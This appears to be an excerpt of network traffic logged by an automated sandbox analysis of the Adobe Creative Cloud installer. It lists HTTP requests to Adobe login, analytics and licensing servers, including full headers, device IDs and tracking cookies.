Source: global traffic	HTTP traffic detected: GET /clients/WAM1_PHSP_21/2x_7ba438462e24c64004988f21d59129d5.png HTTP/1.1Accept: /Referer: https://auth.services.adobe.com/en_US/index.html?delegated_auth_party=requester&callback=https%3A%2F%2Fims-na1.adobelogin.com%2Fims%2Fadobeid%2FCreativeCloudInstaller_v1_0%2FAdobeID%2Fdevice%3Fredirect_uri%3Dhttps%253A%252F%252Foobe.adobe.com%252F%26state%3D%257B%2522ac%2522%253A%2522CCInstaller%2522%252C%2522av%2522%253A%25222.7.0.13%2522%257D%26device_id%3D53bd0868-e882-4020-bfb4-c5d428908b32%26device_name%3D562258%26code_challenge_method%3Dplain%26use_ms_for_expiry%3Dtrue&client_id=CreativeCloudInstaller_v1_0&scope=openid%2CAdobeID%2Ccreative_cloud%2Ccreative_sdk%2Cread_organizations%2Csao.cce_private%2Cadditional_info.account_type&state=%7B%22ac%22%3A%22CCInstaller%22%2C%22av%22%3A%222.7.0.13%22%7D&relay=dfe9ad98-0121-4e58-80a6-14b027bb059a&locale=en_US&flow_type=device&ctx_id=WAM1_PHSP_21&idp_flow_type=login&ab_test=stop-mk-new-text&s_p=google%2Cfacebook%2Capple&response_type=device&device_name=562258&device_id=53bd0868-e882-4020-bfb4-c5d428908b32&code_challenge_method=plain&redirect_uri=https%3A%2F%2Foobe.adobe.com%2F&use_ms_for_expiry=trueAccept-Language: en-USAccept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: static.adobelogin.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /b/ss/adbims,adbadobenonacdcprod,adbadobeprototype/1/JS-2.22.4-LCS4/s74478912959897 HTTP/1.1Accept: /Referer: https://auth.services.adobe.com/en_US/index.html?delegated_auth_party=requester&callback=https%3A%2F%2Fims-na1.adobelogin.com%2Fims%2Fadobeid%2FCreativeCloudInstaller_v1_0%2FAdobeID%2Fdevice%3Fredirect_uri%3Dhttps%253A%252F%252Foobe.adobe.com%252F%26state%3D%257B%2522ac%2522%253A%2522CCInstaller%2522%252C%2522av%2522%253A%25222.7.0.13%2522%257D%26device_id%3D53bd0868-e882-4020-bfb4-c5d428908b32%26device_name%3D562258%26code_challenge_method%3Dplain%26use_ms_for_expiry%3Dtrue&client_id=CreativeCloudInstaller_v1_0&scope=openid%2CAdobeID%2Ccreative_cloud%2Ccreative_sdk%2Cread_organizations%2Csao.cce_private%2Cadditional_info.account_type&state=%7B%22ac%22%3A%22CCInstaller%22%2C%22av%22%3A%222.7.0.13%22%7D&relay=dfe9ad98-0121-4e58-80a6-14b027bb059a&locale=en_US&flow_type=device&ctx_id=WAM1_PHSP_21&idp_flow_type=login&ab_test=stop-mk-new-text&s_p=google%2Cfacebook%2Capple&response_type=device&device_name=562258&device_id=53bd0868-e882-4020-bfb4-c5d428908b32&code_challenge_method=plain&redirect_uri=https%3A%2F%2Foobe.adobe.com%2F&use_ms_for_expiry=trueAccept-Language: en-USContent-Type: text/plain;charset=UTF-8Origin: https://auth.services.adobe.comAccept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: sstats.adobe.comContent-Length: 5216Connection: Keep-AliveCache-Control: no-cacheCookie: AMCV_9E1005A551ED61CA0A490D45%40AdobeOrg=1176715910%7CMCMID%7C85912006310227639011924320131914567332%7CMCAAMLH-1697042594%7C9%7CMCAAMB-1697042594%7CRKhpRz8krg2tLO6pguXWp5olkAcUniQYPHaMWWgdJ3xzPWQmdj0y%7CMCOPTOUT-1696444995s%7CNONE%7CMCAID%7CNONE%7CvVersion%7C5.4.0; AMCVS_9E1005A551ED61CA0A490D45%40AdobeOrg=1; s_ecid=MCMID%7C85912006310227639011924320131914567332; gpv=Account:IMS:GetStarted:OnLoad; s_cc=true
Source: global traffic	HTTP traffic detected: POST /b/ss/adbims,adbadobenonacdcprod,adbadobeprototype/1/JS-2.22.4-LCS4/s71011077179276 HTTP/1.1Accept: /Referer: https://auth.services.adobe.com/en_US/index.html?delegated_auth_party=requester&callback=https%3A%2F%2Fims-na1.adobelogin.com%2Fims%2Fadobeid%2FCreativeCloudInstaller_v1_0%2FAdobeID%2Fdevice%3Fredirect_uri%3Dhttps%253A%252F%252Foobe.adobe.com%252F%26state%3D%257B%2522ac%2522%253A%2522CCInstaller%2522%252C%2522av%2522%253A%25222.7.0.13%2522%257D%26device_id%3D53bd0868-e882-4020-bfb4-c5d428908b32%26device_name%3D562258%26code_challenge_method%3Dplain%26use_ms_for_expiry%3Dtrue&client_id=CreativeCloudInstaller_v1_0&scope=openid%2CAdobeID%2Ccreative_cloud%2Ccreative_sdk%2Cread_organizations%2Csao.cce_private%2Cadditional_info.account_type&state=%7B%22ac%22%3A%22CCInstaller%22%2C%22av%22%3A%222.7.0.13%22%7D&relay=dfe9ad98-0121-4e58-80a6-14b027bb059a&locale=en_US&flow_type=device&ctx_id=WAM1_PHSP_21&idp_flow_type=login&ab_test=stop-mk-new-text&s_p=google%2Cfacebook%2Capple&response_type=device&device_name=562258&device_id=53bd0868-e882-4020-bfb4-c5d428908b32&code_challenge_method=plain&redirect_uri=https%3A%2F%2Foobe.adobe.com%2F&use_ms_for_expiry=trueAccept-Language: en-USContent-Type: text/plain;charset=UTF-8Origin: https://auth.services.adobe.comAccept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: sstats.adobe.comContent-Length: 5165Connection: Keep-AliveCache-Control: no-cacheCookie: AMCV_9E1005A551ED61CA0A490D45%40AdobeOrg=1176715910%7CMCMID%7C85912006310227639011924320131914567332%7CMCAAMLH-1697042594%7C9%7CMCAAMB-1697042594%7CRKhpRz8krg2tLO6pguXWp5olkAcUniQYPHaMWWgdJ3xzPWQmdj0y%7CMCOPTOUT-1696444995s%7CNONE%7CMCAID%7CNONE%7CvVersion%7C5.4.0; AMCVS_9E1005A551ED61CA0A490D45%40AdobeOrg=1; s_ecid=MCMID%7C85912006310227639011924320131914567332; gpv=Account:IMS:GetStarted:OnLoad; s_cc=true
Source: global traffic	HTTP traffic detected: POST /signin/v1/audit HTTP/1.1Accept: application/json, text/plain, /X-DEBUG-ID: dfe9ad98-0121-4e58-80a6-14b027bb059aX-IMS-CLIENTID: CreativeCloudInstaller_v1_0Content-Type: application/jsonReferer: https://auth.services.adobe.com/en_US/index.html?delegated_auth_party=requester&callback=https%3A%2F%2Fims-na1.adobelogin.com%2Fims%2Fadobeid%2FCreativeCloudInstaller_v1_0%2FAdobeID%2Fdevice%3Fredirect_uri%3Dhttps%253A%252F%252Foobe.adobe.com%252F%26state%3D%257B%2522ac%2522%253A%2522CCInstaller%2522%252C%2522av%2522%253A%25222.7.0.13%2522%257D%26device_id%3D53bd0868-e882-4020-bfb4-c5d428908b32%26device_name%3D562258%26code_challenge_method%3Dplain%26use_ms_for_expiry%3Dtrue&client_id=CreativeCloudInstaller_v1_0&scope=openid%2CAdobeID%2Ccreative_cloud%2Ccreative_sdk%2Cread_organizations%2Csao.cce_private%2Cadditional_info.account_type&state=%7B%22ac%22%3A%22CCInstaller%22%2C%22av%22%3A%222.7.0.13%22%7D&relay=dfe9ad98-0121-4e58-80a6-14b027bb059a&locale=en_US&flow_type=device&ctx_id=WAM1_PHSP_21&idp_flow_type=login&ab_test=stop-mk-new-text&s_p=google%2Cfacebook%2Capple&response_type=device&device_name=562258&device_id=53bd0868-e882-4020-bfb4-c5d428908b32&code_challenge_method=plain&redirect_uri=https%3A%2F%2Foobe.adobe.com%2F&use_ms_for_expiry=trueAccept-Language: en-USAccept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: auth.services.adobe.comContent-Length: 778Connection: Keep-AliveCache-Control: no-cacheCookie: AMCV_9E1005A551ED61CA0A490D45%40AdobeOrg=1176715910%7CMCMID%7C85912006310227639011924320131914567332%7CMCAAMLH-1697042594%7C9%7CMCAAMB-1697042594%7CRKhpRz8krg2tLO6pguXWp5olkAcUniQYPHaMWWgdJ3xzPWQmdj0y%7CMCOPTOUT-1696444995s%7CNONE%7CMCAID%7CNONE%7CvVersion%7C5.4.0; AMCVS_9E1005A551ED61CA0A490D45%40AdobeOrg=1; s_ecid=MCMID%7C85912006310227639011924320131914567332; gpv=Account:IMS:GetStarted:OnLoad; s_cc=true; relay=dfe9ad98-0121-4e58-80a6-14b027bb059a
Source: global traffic	HTTP traffic detected: POST /signin/v1/audit HTTP/1.1Accept: application/json, text/plain, /X-DEBUG-ID: dfe9ad98-0121-4e58-80a6-14b027bb059aX-IMS-CLIENTID: CreativeCloudInstaller_v1_0Content-Type: application/jsonReferer: https://auth.services.adobe.com/en_US/index.html?delegated_auth_party=requester&callback=https%3A%2F%2Fims-na1.adobelogin.com%2Fims%2Fadobeid%2FCreativeCloudInstaller_v1_0%2FAdobeID%2Fdevice%3Fredirect_uri%3Dhttps%253A%252F%252Foobe.adobe.com%252F%26state%3D%257B%2522ac%2522%253A%2522CCInstaller%2522%252C%2522av%2522%253A%25222.7.0.13%2522%257D%26device_id%3D53bd0868-e882-4020-bfb4-c5d428908b32%26device_name%3D562258%26code_challenge_method%3Dplain%26use_ms_for_expiry%3Dtrue&client_id=CreativeCloudInstaller_v1_0&scope=openid%2CAdobeID%2Ccreative_cloud%2Ccreative_sdk%2Cread_organizations%2Csao.cce_private%2Cadditional_info.account_type&state=%7B%22ac%22%3A%22CCInstaller%22%2C%22av%22%3A%222.7.0.13%22%7D&relay=dfe9ad98-0121-4e58-80a6-14b027bb059a&locale=en_US&flow_type=device&ctx_id=WAM1_PHSP_21&idp_flow_type=login&ab_test=stop-mk-new-text&s_p=google%2Cfacebook%2Capple&response_type=device&device_name=562258&device_id=53bd0868-e882-4020-bfb4-c5d428908b32&code_challenge_method=plain&redirect_uri=https%3A%2F%2Foobe.adobe.com%2F&use_ms_for_expiry=trueAccept-Language: en-USAccept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: auth.services.adobe.comContent-Length: 748Connection: Keep-AliveCache-Control: no-cacheCookie: AMCV_9E1005A551ED61CA0A490D45%40AdobeOrg=1176715910%7CMCMID%7C85912006310227639011924320131914567332%7CMCAAMLH-1697042594%7C9%7CMCAAMB-1697042594%7CRKhpRz8krg2tLO6pguXWp5olkAcUniQYPHaMWWgdJ3xzPWQmdj0y%7CMCOPTOUT-1696444995s%7CNONE%7CMCAID%7CNONE%7CvVersion%7C5.4.0; AMCVS_9E1005A551ED61CA0A490D45%40AdobeOrg=1; s_ecid=MCMID%7C85912006310227639011924320131914567332; gpv=Account:IMS:GetStarted:OnLoad; s_cc=true; relay=dfe9ad98-0121-4e58-80a6-14b027bb059a
Source: global traffic	HTTP traffic detected: POST /signin/v1/audit HTTP/1.1Accept: application/json, text/plain, /X-DEBUG-ID: dfe9ad98-0121-4e58-80a6-14b027bb059aX-IMS-CLIENTID: CreativeCloudInstaller_v1_0Content-Type: application/jsonReferer: https://auth.services.adobe.com/en_US/index.html?delegated_auth_party=requester&callback=https%3A%2F%2Fims-na1.adobelogin.com%2Fims%2Fadobeid%2FCreativeCloudInstaller_v1_0%2FAdobeID%2Fdevice%3Fredirect_uri%3Dhttps%253A%252F%252Foobe.adobe.com%252F%26state%3D%257B%2522ac%2522%253A%2522CCInstaller%2522%252C%2522av%2522%253A%25222.7.0.13%2522%257D%26device_id%3D53bd0868-e882-4020-bfb4-c5d428908b32%26device_name%3D562258%26code_challenge_method%3Dplain%26use_ms_for_expiry%3Dtrue&client_id=CreativeCloudInstaller_v1_0&scope=openid%2CAdobeID%2Ccreative_cloud%2Ccreative_sdk%2Cread_organizations%2Csao.cce_private%2Cadditional_info.account_type&state=%7B%22ac%22%3A%22CCInstaller%22%2C%22av%22%3A%222.7.0.13%22%7D&relay=dfe9ad98-0121-4e58-80a6-14b027bb059a&locale=en_US&flow_type=device&ctx_id=WAM1_PHSP_21&idp_flow_type=login&ab_test=stop-mk-new-text&s_p=google%2Cfacebook%2Capple&response_type=device&device_name=562258&device_id=53bd0868-e882-4020-bfb4-c5d428908b32&code_challenge_method=plain&redirect_uri=https%3A%2F%2Foobe.adobe.com%2F&use_ms_for_expiry=trueAccept-Language: en-USAccept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: auth.services.adobe.comContent-Length: 783Connection: Keep-AliveCache-Control: no-cacheCookie: AMCV_9E1005A551ED61CA0A490D45%40AdobeOrg=1176715910%7CMCMID%7C85912006310227639011924320131914567332%7CMCAAMLH-1697042594%7C9%7CMCAAMB-1697042594%7CRKhpRz8krg2tLO6pguXWp5olkAcUniQYPHaMWWgdJ3xzPWQmdj0y%7CMCOPTOUT-1696444995s%7CNONE%7CMCAID%7CNONE%7CvVersion%7C5.4.0; AMCVS_9E1005A551ED61CA0A490D45%40AdobeOrg=1; s_ecid=MCMID%7C85912006310227639011924320131914567332; gpv=Account:IMS:GetStarted:OnLoad; s_cc=true; relay=dfe9ad98-0121-4e58-80a6-14b027bb059a
Source: global traffic	HTTP traffic detected: POST /b/ss/adbims,adbadobenonacdcprod,adbadobeprototype/1/JS-2.22.4-LCS4/s73866433273174 HTTP/1.1Accept: /Referer: https://auth.services.adobe.com/en_US/index.html?delegated_auth_party=requester&callback=https%3A%2F%2Fims-na1.adobelogin.com%2Fims%2Fadobeid%2FCreativeCloudInstaller_v1_0%2FAdobeID%2Fdevice%3Fredirect_uri%3Dhttps%253A%252F%252Foobe.adobe.com%252F%26state%3D%257B%2522ac%2522%253A%2522CCInstaller%2522%252C%2522av%2522%253A%25222.7.0.13%2522%257D%26device_id%3D53bd0868-e882-4020-bfb4-c5d428908b32%26device_name%3D562258%26code_challenge_method%3Dplain%26use_ms_for_expiry%3Dtrue&client_id=CreativeCloudInstaller_v1_0&scope=openid%2CAdobeID%2Ccreative_cloud%2Ccreative_sdk%2Cread_organizations%2Csao.cce_private%2Cadditional_info.account_type&state=%7B%22ac%22%3A%22CCInstaller%22%2C%22av%22%3A%222.7.0.13%22%7D&relay=dfe9ad98-0121-4e58-80a6-14b027bb059a&locale=en_US&flow_type=device&ctx_id=WAM1_PHSP_21&idp_flow_type=login&ab_test=stop-mk-new-text&s_p=google%2Cfacebook%2Capple&response_type=device&device_name=562258&device_id=53bd0868-e882-4020-bfb4-c5d428908b32&code_challenge_method=plain&redirect_uri=https%3A%2F%2Foobe.adobe.com%2F&use_ms_for_expiry=trueAccept-Language: en-USContent-Type: text/plain;charset=UTF-8Origin: https://auth.services.adobe.comAccept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: sstats.adobe.comContent-Length: 5216Connection: Keep-AliveCache-Control: no-cacheCookie: AMCV_9E1005A551ED61CA0A490D45%40AdobeOrg=1176715910%7CMCMID%7C85912006310227639011924320131914567332%7CMCAAMLH-1697042594%7C9%7CMCAAMB-1697042594%7CRKhpRz8krg2tLO6pguXWp5olkAcUniQYPHaMWWgdJ3xzPWQmdj0y%7CMCOPTOUT-1696444995s%7CNONE%7CMCAID%7CNONE%7CvVersion%7C5.4.0; AMCVS_9E1005A551ED61CA0A490D45%40AdobeOrg=1; s_ecid=MCMID%7C85912006310227639011924320131914567332; gpv=Account:IMS:GetStarted:OnLoad; s_cc=true
Source: global traffic	HTTP traffic detected: GET /img/generic/jarvis_bubble_chat.svg HTTP/1.1Accept: /Referer: https://auth.services.adobe.com/en_US/index.html?delegated_auth_party=requester&callback=https%3A%2F%2Fims-na1.adobelogin.com%2Fims%2Fadobeid%2FCreativeCloudInstaller_v1_0%2FAdobeID%2Fdevice%3Fredirect_uri%3Dhttps%253A%252F%252Foobe.adobe.com%252F%26state%3D%257B%2522ac%2522%253A%2522CCInstaller%2522%252C%2522av%2522%253A%25222.7.0.13%2522%257D%26device_id%3D53bd0868-e882-4020-bfb4-c5d428908b32%26device_name%3D562258%26code_challenge_method%3Dplain%26use_ms_for_expiry%3Dtrue&client_id=CreativeCloudInstaller_v1_0&scope=openid%2CAdobeID%2Ccreative_cloud%2Ccreative_sdk%2Cread_organizations%2Csao.cce_private%2Cadditional_info.account_type&state=%7B%22ac%22%3A%22CCInstaller%22%2C%22av%22%3A%222.7.0.13%22%7D&relay=dfe9ad98-0121-4e58-80a6-14b027bb059a&locale=en_US&flow_type=device&ctx_id=WAM1_PHSP_21&idp_flow_type=login&ab_test=stop-mk-new-text&s_p=google%2Cfacebook%2Capple&response_type=device&device_name=562258&device_id=53bd0868-e882-4020-bfb4-c5d428908b32&code_challenge_method=plain&redirect_uri=https%3A%2F%2Foobe.adobe.com%2F&use_ms_for_expiry=trueAccept-Language: en-USAccept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: auth.services.adobe.comConnection: Keep-AliveCookie: AMCV_9E1005A551ED61CA0A490D45%40AdobeOrg=1176715910%7CMCMID%7C85912006310227639011924320131914567332%7CMCAAMLH-1697042594%7C9%7CMCAAMB-1697042594%7CRKhpRz8krg2tLO6pguXWp5olkAcUniQYPHaMWWgdJ3xzPWQmdj0y%7CMCOPTOUT-1696444995s%7CNONE%7CMCAID%7CNONE%7CvVersion%7C5.4.0; AMCVS_9E1005A551ED61CA0A490D45%40AdobeOrg=1; s_ecid=MCMID%7C85912006310227639011924320131914567332; gpv=Account:IMS:GetStarted:OnLoad; s_cc=true; relay=dfe9ad98-0121-4e58-80a6-14b027bb059a

Source: global traffic	HTTP traffic detected: GET /core/v5/products/all?channel=ccm&channel=sti&channel=services&channel=mobileApps&platform=win64,win32&_type=xml&productType=Desktop&payload=true&sapCode=PHSP HTTP/1.1Connection: closeContent-Type: text/xml; charset=utf-8Accept: application/xmlUser-Agent: Creative Cloudx-adobe-app-id: CreativeCloudInstaller_win64Host: cdn-ffc.oobesaas.adobe.com
Source: global traffic	HTTP traffic detected: GET /certs/v2/CMjAxODA3MjAwMQ/N0ExN0U4RTNBMzBBMDM4N0VFMTQ5QjlEQjU3QjU3Q0I.der HTTP/1.1Connection: Keep-AliveContent-Type: application/jsonAccept: application/x-x509-ca-certUser-Agent: NGL Client/1.27.0.11 (WINDOWS_64/10.0.17134.1) [2023-10-04T20:16:25.114+0200]X-Api-Key: CreativeCloudInstaller_v1_0X-Request-Id: Req-Id-f91236fd-c052-4bf2-a535-9bdc8cc778dcX-Session-Id: e80bb7ad-4683-4165-a728-74dc0e2c5468.1696443385125Content-Length: 0Host: resources.licenses.adobe.com
Source: global traffic	HTTP traffic detected: GET /certs/v2/IMjAxODA3MjAwMQ/M0M1QUIyMEU4RjY3Rjk5RThBQjI3MjY0NUVDREJGMzA.der HTTP/1.1Connection: Keep-AliveContent-Type: application/jsonAccept: application/x-x509-ca-certUser-Agent: NGL Client/1.27.0.11 (WINDOWS_64/10.0.17134.1) [2023-10-04T20:16:25.114+0200]X-Api-Key: CreativeCloudInstaller_v1_0X-Request-Id: Req-Id-ca1c07de-79a4-460a-93e2-cd47c2c13980X-Session-Id: e80bb7ad-4683-4165-a728-74dc0e2c5468.1696443385125Content-Length: 0Host: resources.licenses.adobe.com
Source: global traffic	HTTP traffic detected: GET /certs/v2/CMjAxODA3MjAwMQ/N0UxODEzQzhCNkYyMDAxRUQ4MUNDRThBRTc0RDg4NDQ.der HTTP/1.1Connection: Keep-AliveContent-Type: application/jsonAccept: application/x-x509-ca-certUser-Agent: NGL Client/1.27.0.11 (WINDOWS_64/10.0.17134.1) [2023-10-04T20:16:25.114+0200]X-Api-Key: CreativeCloudInstaller_v1_0X-Request-Id: Req-Id-123ce472-e732-4de6-814a-32e07b6e08a4X-Session-Id: e80bb7ad-4683-4165-a728-74dc0e2c5468.1696443385125Content-Length: 0Host: resources.licenses.adobe.com
Source: global traffic	HTTP traffic detected: GET /certs/v2/IMjAxODA3MjAwMQ/QjA0RjUwNUQ3ODFDNTgwRTU4MEY2NjQ4RjY5NDVCQTY.der HTTP/1.1Connection: Keep-AliveContent-Type: application/jsonAccept: application/x-x509-ca-certUser-Agent: NGL Client/1.27.0.11 (WINDOWS_64/10.0.17134.1) [2023-10-04T20:16:25.114+0200]X-Api-Key: CreativeCloudInstaller_v1_0X-Request-Id: Req-Id-fee528d9-90b7-4037-8442-02bb02493a2dX-Session-Id: e80bb7ad-4683-4165-a728-74dc0e2c5468.1696443385125Content-Length: 0Host: resources.licenses.adobe.com
Source: global traffic	HTTP traffic detected: GET /en_US/index.html?delegated_auth_party=requester&callback=https%3A%2F%2Fims-na1.adobelogin.com%2Fims%2Fadobeid%2FCreativeCloudInstaller_v1_0%2FAdobeID%2Fdevice%3Fredirect_uri%3Dhttps%253A%252F%252Foobe.adobe.com%252F%26state%3D%257B%2522ac%2522%253A%2522CCInstaller%2522%252C%2522av%2522%253A%25222.7.0.13%2522%257D%26device_id%3D53bd0868-e882-4020-bfb4-c5d428908b32%26device_name%3D562258%26code_challenge_method%3Dplain%26use_ms_for_expiry%3Dtrue&client_id=CreativeCloudInstaller_v1_0&scope=openid%2CAdobeID%2Ccreative_cloud%2Ccreative_sdk%2Cread_organizations%2Csao.cce_private%2Cadditional_info.account_type&state=%7B%22ac%22%3A%22CCInstaller%22%2C%22av%22%3A%222.7.0.13%22%7D&relay=dfe9ad98-0121-4e58-80a6-14b027bb059a&locale=en_US&flow_type=device&ctx_id=WAM1_PHSP_21&idp_flow_type=login&ab_test=stop-mk-new-text&s_p=google%2Cfacebook%2Capple&response_type=device&device_name=562258&device_id=53bd0868-e882-4020-bfb4-c5d428908b32&code_challenge_method=plain&redirect_uri=https%3A%2F%2Foobe.adobe.com%2F&use_ms_for_expiry=true HTTP/1.1Accept: /Accept-Language: en-USAccept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveHost: auth.services.adobe.com
Source: global traffic	HTTP traffic detected: GET /57e67ac4b/styles.3f69be8a.css HTTP/1.1Accept: /Referer: https://auth.services.adobe.com/en_US/index.html?delegated_auth_party=requester&callback=https%3A%2F%2Fims-na1.adobelogin.com%2Fims%2Fadobeid%2FCreativeCloudInstaller_v1_0%2FAdobeID%2Fdevice%3Fredirect_uri%3Dhttps%253A%252F%252Foobe.adobe.com%252F%26state%3D%257B%2522ac%2522%253A%2522CCInstaller%2522%252C%2522av%2522%253A%25222.7.0.13%2522%257D%26device_id%3D53bd0868-e882-4020-bfb4-c5d428908b32%26device_name%3D562258%26code_challenge_method%3Dplain%26use_ms_for_expiry%3Dtrue&client_id=CreativeCloudInstaller_v1_0&scope=openid%2CAdobeID%2Ccreative_cloud%2Ccreative_sdk%2Cread_organizations%2Csao.cce_private%2Cadditional_info.account_type&state=%7B%22ac%22%3A%22CCInstaller%22%2C%22av%22%3A%222.7.0.13%22%7D&relay=dfe9ad98-0121-4e58-80a6-14b027bb059a&locale=en_US&flow_type=device&ctx_id=WAM1_PHSP_21&idp_flow_type=login&ab_test=stop-mk-new-text&s_p=google%2Cfacebook%2Capple&response_type=device&device_name=562258&device_id=53bd0868-e882-4020-bfb4-c5d428908b32&code_challenge_method=plain&redirect_uri=https%3A%2F%2Foobe.adobe.com%2F&use_ms_for_expiry=trueAccept-Language: en-USAccept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: auth.services.adobe.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /img/generic/adobe_logo_black.svg HTTP/1.1Accept: /Referer: https://auth.services.adobe.com/en_US/index.html?delegated_auth_party=requester&callback=https%3A%2F%2Fims-na1.adobelogin.com%2Fims%2Fadobeid%2FCreativeCloudInstaller_v1_0%2FAdobeID%2Fdevice%3Fredirect_uri%3Dhttps%253A%252F%252Foobe.adobe.com%252F%26state%3D%257B%2522ac%2522%253A%2522CCInstaller%2522%252C%2522av%2522%253A%25222.7.0.13%2522%257D%26device_id%3D53bd0868-e882-4020-bfb4-c5d428908b32%26device_name%3D562258%26code_challenge_method%3Dplain%26use_ms_for_expiry%3Dtrue&client_id=CreativeCloudInstaller_v1_0&scope=openid%2CAdobeID%2Ccreative_cloud%2Ccreative_sdk%2Cread_organizations%2Csao.cce_private%2Cadditional_info.account_type&state=%7B%22ac%22%3A%22CCInstaller%22%2C%22av%22%3A%222.7.0.13%22%7D&relay=dfe9ad98-0121-4e58-80a6-14b027bb059a&locale=en_US&flow_type=device&ctx_id=WAM1_PHSP_21&idp_flow_type=login&ab_test=stop-mk-new-text&s_p=google%2Cfacebook%2Capple&response_type=device&device_name=562258&device_id=53bd0868-e882-4020-bfb4-c5d428908b32&code_challenge_method=plain&redirect_uri=https%3A%2F%2Foobe.adobe.com%2F&use_ms_for_expiry=trueAccept-Language: en-USAccept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: auth.services.adobe.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /img/canvas/Fotolia_113489662_XL.jpg HTTP/1.1Accept: /Referer: https://auth.services.adobe.com/en_US/index.html?delegated_auth_party=requester&callback=https%3A%2F%2Fims-na1.adobelogin.com%2Fims%2Fadobeid%2FCreativeCloudInstaller_v1_0%2FAdobeID%2Fdevice%3Fredirect_uri%3Dhttps%253A%252F%252Foobe.adobe.com%252F%26state%3D%257B%2522ac%2522%253A%2522CCInstaller%2522%252C%2522av%2522%253A%25222.7.0.13%2522%257D%26device_id%3D53bd0868-e882-4020-bfb4-c5d428908b32%26device_name%3D562258%26code_challenge_method%3Dplain%26use_ms_for_expiry%3Dtrue&client_id=CreativeCloudInstaller_v1_0&scope=openid%2CAdobeID%2Ccreative_cloud%2Ccreative_sdk%2Cread_organizations%2Csao.cce_private%2Cadditional_info.account_type&state=%7B%22ac%22%3A%22CCInstaller%22%2C%22av%22%3A%222.7.0.13%22%7D&relay=dfe9ad98-0121-4e58-80a6-14b027bb059a&locale=en_US&flow_type=device&ctx_id=WAM1_PHSP_21&idp_flow_type=login&ab_test=stop-mk-new-text&s_p=google%2Cfacebook%2Capple&response_type=device&device_name=562258&device_id=53bd0868-e882-4020-bfb4-c5d428908b32&code_challenge_method=plain&redirect_uri=https%3A%2F%2Foobe.adobe.com%2F&use_ms_for_expiry=trueAccept-Language: en-USAccept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: auth.services.adobe.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /57e67ac4b/scripts.js HTTP/1.1Accept: /Referer: https://auth.services.adobe.com/en_US/index.html?delegated_auth_party=requester&callback=https%3A%2F%2Fims-na1.adobelogin.com%2Fims%2Fadobeid%2FCreativeCloudInstaller_v1_0%2FAdobeID%2Fdevice%3Fredirect_uri%3Dhttps%253A%252F%252Foobe.adobe.com%252F%26state%3D%257B%2522ac%2522%253A%2522CCInstaller%2522%252C%2522av%2522%253A%25222.7.0.13%2522%257D%26device_id%3D53bd0868-e882-4020-bfb4-c5d428908b32%26device_name%3D562258%26code_challenge_method%3Dplain%26use_ms_for_expiry%3Dtrue&client_id=CreativeCloudInstaller_v1_0&scope=openid%2CAdobeID%2Ccreative_cloud%2Ccreative_sdk%2Cread_organizations%2Csao.cce_private%2Cadditional_info.account_type&state=%7B%22ac%22%3A%22CCInstaller%22%2C%22av%22%3A%222.7.0.13%22%7D&relay=dfe9ad98-0121-4e58-80a6-14b027bb059a&locale=en_US&flow_type=device&ctx_id=WAM1_PHSP_21&idp_flow_type=login&ab_test=stop-mk-new-text&s_p=google%2Cfacebook%2Capple&response_type=device&device_name=562258&device_id=53bd0868-e882-4020-bfb4-c5d428908b32&code_challenge_method=plain&redirect_uri=https%3A%2F%2Foobe.adobe.com%2F&use_ms_for_expiry=trueAccept-Language: en-USAccept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: auth.services.adobe.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /57e67ac4b/en_US/messages.json HTTP/1.1Accept: application/json, text/plain, /Referer: https://auth.services.adobe.com/en_US/index.html?delegated_auth_party=requester&callback=https%3A%2F%2Fims-na1.adobelogin.com%2Fims%2Fadobeid%2FCreativeCloudInstaller_v1_0%2FAdobeID%2Fdevice%3Fredirect_uri%3Dhttps%253A%252F%252Foobe.adobe.com%252F%26state%3D%257B%2522ac%2522%253A%2522CCInstaller%2522%252C%2522av%2522%253A%25222.7.0.13%2522%257D%26device_id%3D53bd0868-e882-4020-bfb4-c5d428908b32%26device_name%3D562258%26code_challenge_method%3Dplain%26use_ms_for_expiry%3Dtrue&client_id=CreativeCloudInstaller_v1_0&scope=openid%2CAdobeID%2Ccreative_cloud%2Ccreative_sdk%2Cread_organizations%2Csao.cce_private%2Cadditional_info.account_type&state=%7B%22ac%22%3A%22CCInstaller%22%2C%22av%22%3A%222.7.0.13%22%7D&relay=dfe9ad98-0121-4e58-80a6-14b027bb059a&locale=en_US&flow_type=device&ctx_id=WAM1_PHSP_21&idp_flow_type=login&ab_test=stop-mk-new-text&s_p=google%2Cfacebook%2Capple&response_type=device&device_name=562258&device_id=53bd0868-e882-4020-bfb4-c5d428908b32&code_challenge_method=plain&redirect_uri=https%3A%2F%2Foobe.adobe.com%2F&use_ms_for_expiry=trueAccept-Language: 